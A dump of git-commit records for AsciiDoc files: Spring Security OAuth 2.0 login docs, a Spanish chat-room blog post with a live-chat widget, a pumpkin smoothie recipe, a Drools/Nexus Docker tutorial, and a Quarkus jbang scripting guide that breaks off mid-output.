_\"{scheme}:\/\/{serverName}:{serverPort}\/oauth2\/authorize\/code\/{clientAlias}\"_, which leverages *URI template variables*.\n\n- *scopes* - a comma-delimited string of scope(s) requested during the _Authorization Request_ flow, for example: _openid, email, profile_\n\nNOTE: _OpenID Connect 1.0_ defines these http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#ScopeClaims[standard scopes]: _profile, email, address, phone_\n\nNOTE: Non-standard scopes may be defined by a standard _OAuth 2.0 Provider_. 
Please consult the Provider's OAuth API documentation to learn which scopes are supported.\n\n- *authorization-uri* - the URI used by the client to redirect the end-user's user-agent to the _Authorization Server_ in order to obtain authorization from the end-user (the _Resource Owner_).\n- *token-uri* - the URI used by the client when exchanging an _Authorization Grant_ (for example, Authorization Code) for an _Access Token_ at the _Authorization Server_.\n- *user-info-uri* - the URI used by the client to access the protected resource *UserInfo Endpoint*, in order to obtain attributes of the end-user.\n- *user-info-converter* - the `Converter` implementation class used to convert the *UserInfo Response* to a `UserInfo` (_OpenID Connect 1.0 Provider_) or `OAuth2User` instance (_Standard OAuth 2.0 Provider_).\n\nTIP: The `Converter` implementation class for an _OpenID Connect 1.0 Provider_ is *org.springframework.security.oauth2.client.user.converter.UserInfoConverter*\n and for a standard _OAuth 2.0 Provider_ it's *org.springframework.security.oauth2.client.user.converter.OAuth2UserConverter*.\n\n- *user-info-name-attribute-key* - the _key_ used to retrieve the *Name* of the end-user from the `Map` of available attributes in `UserInfo` or `OAuth2User`.\n\nNOTE: _OpenID Connect 1.0_ defines the http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#StandardClaims[*\"name\"* Claim], which is the end-user's full name and is the default used for `UserInfo`.\n\nIMPORTANT: Standard _OAuth 2.0 Provider's_ may vary the naming of their *Name* attribute. Please consult the Provider's *UserInfo* API documentation.\n This is a *_required_* property when *user-info-converter* is set to `OAuth2UserConverter`.\n\n- *client-name* - this is a descriptive name used for the client. The name may be used in certain scenarios, for example, when displaying the name of the client in the _auto-generated login page_.\n- *client-alias* - an _alias_ which uniquely identifies the client. 
It *must be* unique within a `ClientRegistrationRepository`.\n\n[[oauth2-default-client-properties]]\n=== Default client property values\n\nAs noted previously, <<client-registration-auto-configuration-class, `ClientRegistrationAutoConfiguration`>> loads a _resource_ named *oauth2-clients-defaults.yml*,\nwhich provides a set of default client property values for a number of _well-known_ Providers.\n\nFor example, the *authorization-uri*, *token-uri*, *user-info-uri* rarely change for a Provider and therefore it makes sense to\nprovide a set of defaults in order to reduce the configuration required by the user.\n\nBelow are the current set of default client property values:\n\n.oauth2-clients-defaults.yml\n[source,yaml]\n----\nsecurity:\n oauth2:\n client:\n google:\n client-authentication-method: header\n authorized-grant-type: authorization_code\n redirect-uri: \"{scheme}:\/\/{serverName}:{serverPort}{baseAuthorizeUri}\/{clientAlias}\"\n scopes: openid, email, profile\n authorization-uri: \"https:\/\/accounts.google.com\/o\/oauth2\/auth\"\n token-uri: \"https:\/\/accounts.google.com\/o\/oauth2\/token\"\n user-info-uri: \"https:\/\/www.googleapis.com\/oauth2\/v3\/userinfo\"\n user-info-converter: \"org.springframework.security.oauth2.client.user.converter.UserInfoConverter\"\n client-name: Google\n client-alias: google\n github:\n client-authentication-method: header\n authorized-grant-type: authorization_code\n redirect-uri: \"{scheme}:\/\/{serverName}:{serverPort}{baseAuthorizeUri}\/{clientAlias}\"\n scopes: user\n authorization-uri: \"https:\/\/github.com\/login\/oauth\/authorize\"\n token-uri: \"https:\/\/github.com\/login\/oauth\/access_token\"\n user-info-uri: \"https:\/\/api.github.com\/user\"\n user-info-converter: \"org.springframework.security.oauth2.client.user.converter.OAuth2UserConverter\"\n client-name: GitHub\n client-alias: github\n facebook:\n client-authentication-method: form\n authorized-grant-type: authorization_code\n redirect-uri: \"{scheme}:\/\/{serverName}:{serverPort}{baseAuthorizeUri}\/{clientAlias}\"\n scopes: public_profile, email\n authorization-uri: \"https:\/\/www.facebook.com\/v2.8\/dialog\/oauth\"\n token-uri: \"https:\/\/graph.facebook.com\/v2.8\/oauth\/access_token\"\n user-info-uri: \"https:\/\/graph.facebook.com\/me\"\n user-info-converter: \"org.springframework.security.oauth2.client.user.converter.OAuth2UserConverter\"\n client-name: Facebook\n client-alias: facebook\n okta:\n client-authentication-method: header\n authorized-grant-type: authorization_code\n redirect-uri: \"{scheme}:\/\/{serverName}:{serverPort}{baseAuthorizeUri}\/{clientAlias}\"\n scopes: openid, email, profile\n user-info-converter: \"org.springframework.security.oauth2.client.user.converter.UserInfoConverter\"\n client-name: Okta\n client-alias: okta\n----\n\n= Appendix\n'''\n\n[[configure-non-spring-boot-app]]\n== Configuring a _Non-Spring-Boot_ application\n\nIf you are not using Spring Boot for your application, you will not be able to leverage the auto-configuration features for OAuth 2.0 Login.\nYou will be required to provide your own _security configuration_ in order to enable OAuth 2.0 Login.\n\nThe following sample code demonstrates a minimal security configuration for enabling OAuth 2.0 Login.\n\nLet's assume we have a _properties file_ named *oauth2-clients.properties* on the _classpath_ and it specifies all the _required_ properties for an OAuth Client, specifically 
_Google_.\n\n.oauth2-clients.properties\n[source,properties]\n----\nsecurity.oauth2.client.google.client-id=${client-id}\nsecurity.oauth2.client.google.client-secret=${client-secret}\nsecurity.oauth2.client.google.client-authentication-method=header\nsecurity.oauth2.client.google.authorized-grant-type=authorization_code\nsecurity.oauth2.client.google.redirect-uri=http:\/\/localhost:8080\/oauth2\/authorize\/code\/google\nsecurity.oauth2.client.google.scopes=openid,email,profile\nsecurity.oauth2.client.google.authorization-uri=https:\/\/accounts.google.com\/o\/oauth2\/auth\nsecurity.oauth2.client.google.token-uri=https:\/\/accounts.google.com\/o\/oauth2\/token\nsecurity.oauth2.client.google.user-info-uri=https:\/\/www.googleapis.com\/oauth2\/v3\/userinfo\nsecurity.oauth2.client.google.user-info-converter=org.springframework.security.oauth2.client.user.converter.UserInfoConverter\nsecurity.oauth2.client.google.client-name=Google\nsecurity.oauth2.client.google.client-alias=google\n----\n\nThe following _security configuration_ will enable OAuth 2.0 Login using _Google_ as the _Authentication Provider_:\n\n[source,java]\n----\n@EnableWebSecurity\n@PropertySource(\"classpath:oauth2-clients.properties\")\npublic class SecurityConfig extends WebSecurityConfigurerAdapter {\n\tprivate Environment environment;\n\n\tpublic SecurityConfig(Environment environment) {\n\t\tthis.environment = environment;\n\t}\n\n\t@Override\n\tprotected void configure(HttpSecurity http) throws Exception {\n http\n .authorizeRequests()\n .anyRequest().authenticated()\n .and()\n .oauth2Login()\n .clients(clientRegistrationRepository())\n .userInfoEndpoint()\n .userInfoTypeConverter(\n new UserInfoConverter(),\n new URI(\"https:\/\/www.googleapis.com\/oauth2\/v3\/userinfo\"));\n\t}\n\n\t@Bean\n\tpublic ClientRegistrationRepository clientRegistrationRepository() {\n\t\tList<ClientRegistration> clientRegistrations = Collections.singletonList(\n\t\t\tclientRegistration(\"security.oauth2.client.google.\"));\n\n\t\treturn new InMemoryClientRegistrationRepository(clientRegistrations);\n\t}\n\n\tprivate ClientRegistration clientRegistration(String clientPropertyKey) {\n\t\tString clientId = this.environment.getProperty(clientPropertyKey + \"client-id\");\n\t\tString clientSecret = this.environment.getProperty(clientPropertyKey + \"client-secret\");\n\t\tClientAuthenticationMethod clientAuthenticationMethod = ClientAuthenticationMethod.valueOf(\n\t\t\tthis.environment.getProperty(clientPropertyKey + \"client-authentication-method\").toUpperCase());\n\t\tAuthorizationGrantType authorizationGrantType = AuthorizationGrantType.valueOf(\n\t\t\tthis.environment.getProperty(clientPropertyKey + \"authorized-grant-type\").toUpperCase());\n\t\tString redirectUri = this.environment.getProperty(clientPropertyKey + \"redirect-uri\");\n\t\tString[] scopes = this.environment.getProperty(clientPropertyKey + \"scopes\").split(\",\");\n\t\tString authorizationUri = this.environment.getProperty(clientPropertyKey + \"authorization-uri\");\n\t\tString tokenUri = this.environment.getProperty(clientPropertyKey + \"token-uri\");\n\t\tString userInfoUri = this.environment.getProperty(clientPropertyKey + \"user-info-uri\");\n\t\tString clientName = this.environment.getProperty(clientPropertyKey + \"client-name\");\n\t\tString clientAlias = this.environment.getProperty(clientPropertyKey + \"client-alias\");\n\n\t\treturn new 
ClientRegistration.Builder(clientId)\n\t\t\t.clientSecret(clientSecret)\n\t\t\t.clientAuthenticationMethod(clientAuthenticationMethod)\n\t\t\t.authorizedGrantType(authorizationGrantType)\n\t\t\t.redirectUri(redirectUri)\n\t\t\t.scopes(scopes)\n\t\t\t.authorizationUri(authorizationUri)\n\t\t\t.tokenUri(tokenUri)\n\t\t\t.userInfoUri(userInfoUri)\n\t\t\t.clientName(clientName)\n\t\t\t.clientAlias(clientAlias)\n\t\t\t.build();\n\t}\n}\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"48f16ce2fe3cdd93da83fe321ff81b2abc00ac1c","subject":"Update 2016-08-25-Sala-de-Chat-Privado.adoc","message":"Update 2016-08-25-Sala-de-Chat-Privado.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2016-08-25-Sala-de-Chat-Privado.adoc","new_file":"_posts\/2016-08-25-Sala-de-Chat-Privado.adoc","new_contents":"= Sala de Chat Privado\n:hp-tags: Chat,\n\n== Entra en esta sala si quieres chatear en privado. \n\nPara chatear lanza el chat buscando en la p\u00e1gina la imagen flotante similar a esta:\n\n\/\/image::https:\/\/livechatbot.net\/images\/pic01.png[]\n\/\/image::http:\/\/github.com\/txemis\/txemis.github.io\/images\/pic01.png[]\n\/\/image::http:\/\/github.com\/txemis\/txemis.github.io\/images\/livechat.jpg[]\n\/\/image::https:\/\/github.com\/txemis\/txemis.github.io\/blob\/master\/images\/livechat.png[]..\n\nimage::livechat.jpg[]\n\n++++\n<script id=\"TelegramLiveChatLoader\" data-bot=\"F7EDD3EE-4BF6-11E6-972D-C7C0FDD63063\" src=\"\/\/livechatbot.net\/assets\/chat\/js\/loader.js\"><\/script>\n++++","old_contents":"= Sala de Chat Privado\n:hp-tags: Chat,\n\n== Entra en esta sala si quieres chatear en privado\n\nPara chatear lanza el chat buscando en la p\u00e1gina la imagen flotante similar a esta:\n\n\/\/image::https:\/\/livechatbot.net\/images\/pic01.png[]\n\/\/image::http:\/\/github.com\/txemis\/txemis.github.io\/images\/pic01.png[]\n\/\/image::http:\/\/github.com\/txemis\/txemis.github.io\/images\/livechat.jpg[]\n\/\/image::https:\/\/github.com\/txemis\/txemis.github.io\/blob\/master\/images\/livechat.png[]..\n\nimage::livechat.jpg[]\n\n++++\n<script id=\"TelegramLiveChatLoader\" data-bot=\"F7EDD3EE-4BF6-11E6-972D-C7C0FDD63063\" src=\"\/\/livechatbot.net\/assets\/chat\/js\/loader.js\"><\/script>\n++++","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e5125f8aaff240f2c55fb340e6ce2614604e1ecc","subject":"Update 2016-09-24-Pumpkin-Smoothie-Jar.adoc","message":"Update 2016-09-24-Pumpkin-Smoothie-Jar.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-09-24-Pumpkin-Smoothie-Jar.adoc","new_file":"_posts\/2016-09-24-Pumpkin-Smoothie-Jar.adoc","new_contents":"= Pumpkin Smoothie Jar\n\n:hp-tags: [vegan, pumpkin, smoothie, fall, breakfast]\n\nSince fall is here I decided to bake three different pumpkin recipes! Here is the first one: Pumpkin Smoothie Jar.\n\nThis is a really easy breakfast to make. It smells so good, it'll make you want to curl up with a good book and a hot cup of coffee by the fire while you slowly enjoy every bite.\n\nimage::final_shot.jpg[Pumpkin Jar]\n\n*Pumpkin Smoothie*\n\nThe first step to making a pumpkin smoothie jar is to make the smoothie. For this recipe, I used the pumpkin pur\u00e9e that I make myself, but you can definitely use store-bought pumpkin pur\u00e9e. 
Scroll down to view the simple recipe to make your very own pumpkin pur\u00e9e.\n\nimage::puree.jpg[Pumpkin Pur\u00e9e]\n\n+++<u>Ingredients<\/u>+++\n[square]\n* 2 medjool dates\n* 130 g pumpkin pur\u00e9e\n* 160 ml almond milk (unsweetened)\n* 0.5 g nutmeg\n* 0.5 g all spice\n* 1.5 g cinnamon\n\n+++<u>Instructions<\/u>+++\n[square]\n. Put all the ingredients in a blender and blend until smooth.\n\n\n*Pumpkin Smoothie Jar*\n\n+++<u>Ingredients<\/u>+++\n[square]\n* pumpkin smoothie\n* 30 g chia seeds\n* 70 g vegan granola of your choice\n* 80 g yogurt of your choice\n* 20 g pumpkin seeds\n\n+++<u>Instructions<\/u>+++\n[square]\n. Arrange in a bowl or jar in an aesthetically pleasing way :)\n. Add fruits or other nuts according to your cravings today!\n\nYou're done! You can also just drink the smoothie on its own. I would suggest simply adding a bit more almond milk to thin it out a bit.\n\nimage::jar_top.jpg[Pumpkin Jar top view]\nimage::hand_jar.jpg[Pumpkin Jar]\n\n---\n\n*Pumpkin Pur\u00e9e*\n\nYou can either buy pumpkin pur\u00e9e in a can or make your own. I prefer to make my own; it's pretty simple, all you need is a small pumpkin. Pro tip: make it the night before you want to make your favourite pumpkin recipe.\n\nimage::pumpkin_slices.jpg[Pumpkin Slices]\n\n+++<u>Ingredients<\/u>+++\n[square]\n* 1 small pumpkin\n\n+++<u>Instructions<\/u>+++\n[square]\n. Set the oven to 190 C.\n. Cut the pumpkin in half with a sharp knife and empty out the guts. Keep the seeds and rinse them if you want to roast them later.\n. Cut the pumpkin halves lengthwise into six slices. \n. Arrange the pumpkin slices outer skin down on a baking pan, no oil is needed.\n. Bake the pumpkin for one hour, or until you can easily poke a fork through the skin.\n. Once ready, take it out of the oven and let it cool.\n. After it has cooled down, use your hands to peel the outer skin off the pulp.\n. Put the pulp into a food processor and pur\u00e9e (or mash with a fork or potato masher).\n\nVoil\u00e0! Keep your pur\u00e9e in the fridge for up to a week or freeze some for later use.\n","old_contents":"= Pumpkin Smoothie Jar\n\n:hp-tags: [vegan, pumpkin, smoothie, breakfast]\n\nThis month I decided to bake three different recipies made with pumpkin! Here is the first one.\n\n*Pumpkin Pur\u00e9e*\n\nFirst off, make the pumpkin pur\u00e9e with a small pumpkin. I usually make this the night before I want to make a pumpkin recipe.\n\n+++<u>Ingredients<\/u>+++\n[square]\n* 1 small pumpkin\n\n+++<u>Instructions<\/u>+++\n[square]\n* Set the oven to 190C.\n* Cut the pumpkin in half with a sharp knife and empty our the guts. Keep the seeds and rince them if you want to roast them later.\n* Cut the pumpkin halves lengthwise into six slices. \n* Arrange the pumpkin slices outter skin down on a baking pan, no oil is needed.\n* Bake the pumpkin for one hour, or until you can easily poke a fork through the skin.\n* Once ready, take out of the even and let it cool.\n* After it has cooled down, use you hands to peel the outer skin off the pulp.\n* Put the pulp into a food processor and pur\u00e9e (or mash with a for or potato masher).\n\nVoil\u00e0! Keep your pur\u00e9e in the fridge for up to a week or freeze some for later use.\n\n\nNow for the smoothie!\n\nThis is a really easy breakfast to make. 
It smells so good, it'll make you want to curl up with a good book and a hot cup of coffee by the fire while you slowly enjoy every bite.\n\n*Pumpkin Smoothie*\n\n+++<u>Ingredients<\/u>+++\n[square]\n* 2 medjool dates\n* 130 g pumpkin pur\u00e9e\n* 160 ml almond milk (unsweetened)\n* 0.5 g nutmeg\n* 0.5 g all spice\n* 1.5 g cinnamon\n\n+++<u>Instructions<\/u>+++\n[square]\n* Put all the ingredients in a blender and mix under smoothe\n\n*Pumpkin Smoothie Jar*\n\n+++<u>Ingredients<\/u>+++\n[square]\n* pumpkin smoothie\n* 30 g chia seeds\n* 70 g vegan granola of your choice\n* 80 g yogurt of your choice\n* 20 g pumpkin seeds\n\n+++<u>Instructions<\/u>+++\n[square]\n* Arrange in a bowl or jar in an aesthetically pleasing way :)\n* Add fruits or other nuts according to your cravings today!\n\nYou're done!\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"5a67185b8e3ab38a6910b74c93c30eddcd0ac6e9","subject":"Update 2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc","message":"Update 2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc","repos":"ambarishpande\/blog,ambarishpande\/blog,ambarishpande\/blog,ambarishpande\/blog","old_file":"_posts\/2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc","new_file":"_posts\/2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc","new_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n:hp-tags: Docker, Drools Workbench, Kie Workbench, Nexus, maven\n\/\/ :hp-alt-title: My English Title\n= Drools workbench and Nexus with Docker.\n\nThis tutorial will help you set up the Drools Workbench UI to publish artifacts to a custom Nexus repository, particularly if you are running both of these services in Docker containers.\n\n== Step 1: Set up the Nexus docker container\n \n $ docker pull sonatype\/nexus\n $ docker run -d -p 8081:8081 --name nexus sonatype\/nexus:oss\n \nVerify that the container is up and running.\nNote the IP address of the container.\n\n== Step 2: Modify the Drools-workbench Dockerfile to include maven settings.xml in the container.\n \n $ git clone https:\/\/github.com\/jboss-dockerfiles\/drools.git\n $ cd drools\/drools-wb\/showcase\/etc\/\n $ nano settings.xml\n <settings>\n <localRepository>${env.HOME}\/.m2\/repository<\/localRepository>\n <servers>\n <server>\n <id>workbench<\/id> <!-- Specify this in project pom -->\n <username>deployment<\/username>\n <password>deployment123<\/password>\n <configuration>\n <wagonProvider>httpclient<\/wagonProvider>\n <httpConfiguration>\n <all>\n <usePreemptive>true<\/usePreemptive>\n <\/all>\n <\/httpConfiguration>\n <\/configuration>\n <\/server>\n <\/servers>\n <\/settings>\n\n $ cd ..\n $ nano Dockerfile\n \nAdd these lines in the Drools Workbench Custom Configuration section:\n\n RUN mkdir -p $HOME\/.m2\n ADD etc\/settings.xml $JBOSS_HOME\/..\/.m2\/settings.xml\n\nAdd this line in the _Added files are chowned.._ 
section:\n\n && \\\nchown jboss:jboss $JBOSS_HOME\/..\/.m2\/settings.xml\n\nSave and close.\n\n $ .\/build.sh\n \n== Step 3: Run the drools-workbench docker container\n \n $ docker run -p 8080:8080 -p 8001:8001 -d --name drools-workbench jboss\/drools-workbench-showcase:latest ( or your own tag )\n\n== Step 4: Create a project in the Drools Workbench UI\nGo to *localhost:8080\/drools-wb*\t+\nLog in using admin:admin\t+\nGo to *Authoring>Project Authoring* and create a project.\t+\nGo to *Authoring>Administration>Repositories* and add the following to the pom.xml:\n\n <distributionManagement>\n\t <repository>\n \t<id>workbench<\/id>\n <name>Workbench<\/name>\n <url>http:\/\/nexus_ip:8081\/nexus\/content\/repositories\/releases\/<\/url>\n <\/repository>\n <snapshotRepository>\n \t<id>workbench-snapshot<\/id>\n <name>Workbench Snapshot<\/name>\n <url>http:\/\/nexus_ip:8081\/nexus\/content\/repositories\/snapshots\/<\/url>\n <\/snapshotRepository>\n <\/distributionManagement>\n\n== Step 5: Build and Deploy\nGo to *Authoring>Project Authoring* and select your project.\t+\nClick on the *Build and Deploy* button on the top right.\t+\nYour artifacts should be published to the configured Nexus.\n\n\n\n\n== For non-Docker (standalone):\nModify ~\/.m2\/settings.xml to include the lines shown in Step 2.\t+\nAlso follow Step 4.","old_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n= Drools workbench and Nexus with Docker.\nThis tutorial will help you to setup drools workbench ui to publish artifacts to a custom nexus repository particularly if you are using both these services in docker containers.\n\n== Step 1: Setup Nexus docker container\n \n $ docker pull sonatype\/nexus\n $ docker run -d -p 8081:8081 --name nexus sonatype\/nexus:oss\n \nVerify that the container is up and running.\nNote the ip address of the container.\n\n== Step 2: Modify Drools-workbench dockerfile to include maven settings.xml in the container.\n \n $ git clone https:\/\/github.com\/jboss-dockerfiles\/drools.git\n $ cd drools\/drools-wb\/showcase\/etc\/\n $ nano settings.xml\n <settings>\n <localRepository>${env.HOME}\/.m2\/repository<\/localRepository>\n <servers>\n <server>\n <id>workbench<\/id> <!-- Specify this in project pom -->\n <username>deployment<\/username>\n <password>deployment123<\/password>\n <configuration>\n <wagonProvider>httpclient<\/wagonProvider>\n <httpConfiguration>\n <all>\n <usePreemptive>true<\/usePreemptive>\n <\/all>\n <\/httpConfiguration>\n <\/configuration>\n <\/server>\n <\/servers>\n <\/settings>\n\n $ cd ..\n $ nano Dockerfile\n \nAdd this line in Drools Workbench Custom Configuration section\n\n RUN mkdir -p $HOME\/.m2\n ADD etc\/settings.xml $JBOSS_HOME\/..\/.m2\/settings.xml\n\nAdd this line in Added files are chowned.. 
Section\n\n && \\\nchown jboss:jboss $JBOSS_HOME\/..\/.m2\/settings.xml\n\nSave and close\n\n $ .\/build.sh\n \n== Step3 : Run the drools-workbench docker container\n \n $ docker run -p 8080:8080 -p 8001:8001 -d --name drools-workbench jboss\/drools-workbench-showcase:latest ( or your own tag )\n\n== Step 4: Create a project in the drools workbench ui\nGot to *localhost:8080\/drools-wb*\t+\nLogin using admin:admin\t+\nGo to *Authoring>Project Authoring* and create a project.\t+\nGo to the *Authoring>Administration>Repositories* and add the following to the pom.xml\n\n <distributionManagement>\n\t <repository>\n \t<id>workbench<\/id>\n <name>Workbench<\/name>\n <url>http:\/\/nexus_ip:8081\/nexus\/content\/repositories\/releases\/<\/url>\n <\/repository>\n <snapshotRepository>\n \t<id>workbench-snapshot<\/id>\n <name>Workbench Snapshot<\/name>\n <url>http:\/\/nexus_ip:8081\/nexus\/content\/repositories\/snapshots\/<\/url>\n <\/snapshotRepository>\n <\/distributionManagement>\n\n== Step 5: Build and Deploy\nGo to *Authoring>Project Authoring* and select your project.\t+\nClick on *Build and Deploy* button on the top right.\t+\nYour artifacts should be published to the configured nexus.\n\n\n\n\n== For Non docker ( Standalone ) :\nModify ~\/.m2\/settings.xml to include the lines shown in step 2.\t+\nAnd also follow step 4.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"761eb5a2fedaaca478c42a4272e7a7ff72ff9beb","subject":"Update 2017-10-27-Org-mode-to-HTML-yet-another-take.adoc","message":"Update 2017-10-27-Org-mode-to-HTML-yet-another-take.adoc","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-10-27-Org-mode-to-HTML-yet-another-take.adoc","new_file":"_posts\/2017-10-27-Org-mode-to-HTML-yet-another-take.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"fe64130a2725f682b522f36cd084705cb19d0b6a","subject":"Proofread Scripting with jbang guide","message":"Proofread Scripting with jbang guide\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/scripting.adoc","new_file":"docs\/src\/main\/asciidoc\/scripting.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Scripting with Quarkus\n:extension-status: preview\n\nQuarkus provides integration with https:\/\/jbang.dev[jbang], which allows you to write Java scripts\/applications with no Maven or Gradle required to get them running.\n\nIn this guide, we will see how you can write a REST application using just a single Java file.\n\ninclude::.\/status-include.adoc[]\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 5 minutes\n* https:\/\/jbang.dev\/download[jbang v0.40.3+]\n* an IDE\n* GraalVM installed if you want to run in native mode\n\n== Solution\n\nNormally we would link to a Git repository to clone, but in this case there are no additional files beyond the following:\n\n[source,java,subs=attributes+]\n----\n\/\/usr\/bin\/env jbang \"$0\" \"$@\" ; exit $?\n\/\/DEPS io.quarkus:quarkus-resteasy:999-SNAPSHOT\n\/\/JAVAC_OPTIONS -parameters\n\/\/JAVA_OPTIONS -Djava.util.logging.manager=org.jboss.logmanager.LogManager\n\nimport 
io.quarkus.runtime.Quarkus;\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\nimport javax.ws.rs.core.MediaType;\nimport org.jboss.resteasy.annotations.jaxrs.PathParam;\nimport org.jboss.logging.Logger;\n\n@Path(\"\/hello\")\n@ApplicationScoped\npublic class quarkusapp {\n\n    @GET\n    public String sayHello() {\n        return \"hello\";\n    }\n\n    public static void main(String[] args) {\n        Quarkus.run(args);\n    }\n\n    @Inject\n    GreetingService service;\n\n    @GET\n    @Produces(MediaType.TEXT_PLAIN)\n    @Path(\"\/greeting\/{name}\")\n    public String greeting(@PathParam String name) {\n        return service.greeting(name);\n    }\n\n    @ApplicationScoped\n    static public class GreetingService {\n\n        public String greeting(String name) {\n            return \"hello \" + name;\n        }\n    }\n}\n----\n\n== Architecture\n\nIn this guide, we create a straightforward application serving a `hello` endpoint with a single source file, no additional build files like `pom.xml` or `build.gradle` needed. To demonstrate dependency injection, this endpoint uses a `greeting` bean.\n\nimage::getting-started-architecture.png[alt=Architecture]\n\n== Creating the initial file\n\nFirst, we need a Java file. jbang lets you create an initial version using:\n\n[source,shell,subs=attributes+]\n----\njbang scripting\/quarkusapp.java\ncd scripting\n----\n\nThis command generates a .java file that you can directly run on Linux and macOS, i.e. `.\/quarkusapp.java` - on Windows you need to use `jbang quarkusapp.java`.\n\nThis initial version will print `Hello World` when run.\n\nOnce generated, look at `quarkusapp.java`.\n\nYou will find at the top a line looking like this:\n\n[source,java]\n----\n\/\/usr\/bin\/env jbang \"$0\" \"$@\" ; exit $?\n----\n\nThis line is what on Linux and macOS allows you to run it as a script. On Windows this line is ignored.\n\nThe next line\n\n[source,java]\n----\n\/\/ \/\/DEPS <dependency1> <dependency2>\n----\n\nillustrates how you add dependencies to this script. This is a feature of `jbang`.\n
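\nOther `\/\/`-prefixed directives work the same way - for instance, the solution file at the top of this guide already uses two of them to pass compiler and runtime flags:\n\n[source,java]\n----\n\/\/JAVAC_OPTIONS -parameters\n\/\/JAVA_OPTIONS -Djava.util.logging.manager=org.jboss.logmanager.LogManager\n----\n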
This is a feature of `jbang`.\n\nGo ahead and update this line to include the `quarkus-resteasy` dependency like so:\n\n[source,shell,subs=attributes+]\n----\n\/\/DEPS io.quarkus:quarkus-resteasy:{quarkus-version}\n----\n\nNow, run `jbang quarkusapp.java` and you will see `jbang` resolving this dependency and building the jar with help from Quarkus' jbang integration.\n\n[source,shell,subs=attributes+] \n----\n$ jbang quarkusapp.java\n\u276f jbang quarkusapp.java\n[jbang] Resolving dependencies...\n[jbang] Resolving io.quarkus:quarkus-resteasy:{quarkus-version}...Done\n[jbang] Dependencies resolved\n[jbang] Building jar...\n[jbang] Post build with io.quarkus.launcher.JBangIntegration\nAug 30, 2020 5:40:55 AM org.jboss.threads.Version <clinit>\nINFO: JBoss Threads version 3.1.1.Final\nAug 30, 2020 5:40:56 AM io.quarkus.deployment.QuarkusAugmentor run\nINFO: Quarkus augmentation completed in 722ms\nHello World\n----\n\nFor now the application does nothing new.\n\n[TIP]\n.How do I edit this file and get content assist?\n====\nAs there is nothing but a `.java` file, most IDEs do not handle content assist well.\nTo work around that you can run `jbang edit quarkusapp.java` which will print out a directory that will have a temporary project setup you can use in your IDE.\n\nOn Linux\/macOS you can run `<idecommand> `jbang edit quarkusapp.java``.\n\nIf you add dependencies while editing you can get jbang to automatically refresh\nthe IDE project using `jbang edit --live=<idecommand> quarkusapp.java`.\n====\n\n\n=== The JAX-RS resources\n\nNow let us replace the class with one that uses Quarkus features:\n\n[source,java]\n----\nimport io.quarkus.runtime.Quarkus;\nimport javax.enterprise.context.ApplicationScoped;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\n\n@Path(\"\/hello\")\n@ApplicationScoped\npublic class quarkusapp {\n\n @GET\n public String sayHello() {\n return \"hello\";\n }\n\n public static void main(String[] args) {\n Quarkus.run(args);\n }\n}\n----\n\nIt's a very simple class with a main method that starts Quarkus with a REST endpoint, returning \"hello\" to requests on \"\/hello\".\n\n[TIP]\n.Why is the `main` method there?\n====\nA `main` method is currently needed for the `jbang` integration to work - we might remove this requirement in the future.\n====\n\n== Running the application\n\nNow when you run the application you will see Quarkus start up.\n\nUse: `jbang quarkusapp.java`:\n\n[source,shell,subs=attributes+]\n----\n$ jbang quarkusapp.java\n jbang quarkusapp.java\n[jbang] Building jar...\n[jbang] Post build with io.quarkus.launcher.JBangIntegration\nAug 30, 2020 5:49:01 AM org.jboss.threads.Version <clinit>\nINFO: JBoss Threads version 3.1.1.Final\nAug 30, 2020 5:49:02 AM io.quarkus.deployment.QuarkusAugmentor run\nINFO: Quarkus augmentation completed in 681ms\n__ ____ __ _____ ___ __ ____ ______\n --\/ __ \\\/ \/ \/ \/ _ | \/ _ \\\/ \/\/_\/ \/ \/ \/ __\/\n -\/ \/_\/ \/ \/_\/ \/ __ |\/ , _\/ ,< \/ \/_\/ \/\\ \\\n--\\___\\_\\____\/_\/ |_\/_\/|_\/_\/|_|\\____\/___\/\n2020-08-30 05:49:03,255 INFO [io.quarkus] (main) Quarkus {quarkus-version} on JVM started in 0.638s. 
